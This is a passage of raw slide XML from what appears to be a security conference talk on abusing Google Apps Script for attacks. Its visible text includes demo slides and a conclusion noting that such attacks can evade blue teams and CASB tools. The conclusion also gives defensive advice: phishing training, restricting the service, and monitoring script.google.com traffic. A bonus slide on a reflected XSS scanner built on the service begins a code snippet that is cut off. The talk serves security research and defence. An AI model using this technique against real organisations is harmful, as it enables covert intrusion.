          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="800" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5" descr="An image containing text&#10;&#10;Auto-generated description">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECFAD21-3DEF-9D20-DAC7-DD53AE293102}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="531177" y="1974532"/>
            <a:ext cx="4759325" cy="1712595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA80320-6419-6B93-983B-55C18E541D8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>37/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3331823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C27BB5-1701-6438-C5DF-406E7447D01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089F3838-1844-5770-E599-207DF64E1F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457103" y="1884713"/>
            <a:ext cx="8346600" cy="1165668"/>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751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Demo</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphique 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F19B0AC-A107-5AA0-6CC0-645E70E72B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684560" y="4620960"/>
            <a:ext cx="1271880" cy="255600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2484359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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="GAS - GreHack">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1B7195C-8628-D89D-7893-2D3590379F8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57650" y="2295525"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146344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8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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="QITS_S2">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74A9FE61-C126-455C-2359-EA1BD345856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98217" cy="5173997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155209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5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C27BB5-1701-6438-C5DF-406E7447D01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089F3838-1844-5770-E599-207DF64E1F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398700" y="1899953"/>
            <a:ext cx="8346600" cy="1165668"/>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751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphique 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F19B0AC-A107-5AA0-6CC0-645E70E72B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684560" y="4620960"/>
            <a:ext cx="1271880" cy="255600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2762077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Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Sous-titre 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC270F5D-E53C-182B-1F0B-8E9773948A95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311710" y="1272521"/>
            <a:ext cx="8184589" cy="3770155"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Google Apps Script is a powerful tool to automate many tasks in Google applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>But:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>It is possible to use this service to conduct attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Because a lot of Google services are used by internal users it is potentially more difficult to detect by the blue teams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Some protection services potentially misconfigured like Cloud Access Security Broker (CASB) are blind to these attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Some suggestions to consider:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Continue to educate employees about phishing attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Restrict the use of Google Apps Script for accounts using Google Workspace (or limit the use of specifical calls)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Monitor requests to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1450" i="1" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>script.google.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1450" i="1" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>appsheet.com</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1450" i="1" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1450" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1450" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{807694AE-A00A-5309-9000-E474A751FAD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>42/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15962302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C27BB5-1701-6438-C5DF-406E7447D01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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PlaceHolder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089F3838-1844-5770-E599-207DF64E1F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457103" y="1884713"/>
            <a:ext cx="8346600" cy="1165668"/>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751"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Bonus</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Graphique 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F19B0AC-A107-5AA0-6CC0-645E70E72B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684560" y="4620960"/>
            <a:ext cx="1271880" cy="255600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9186774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2" y="100824"/>
            <a:ext cx="5784458"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Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> XSS scan via GAS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle : coins arrondis 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77777822-BD22-8F33-489E-D1CCB14DDF6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4884922" y="959412"/>
            <a:ext cx="3210401" cy="4083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1000" b="1" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0" err="1"/>
              <a:t>snippet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0"/>
              <a:t> (Page.html):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    &lt;base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="_top"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    &lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>processForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>        var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls-form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
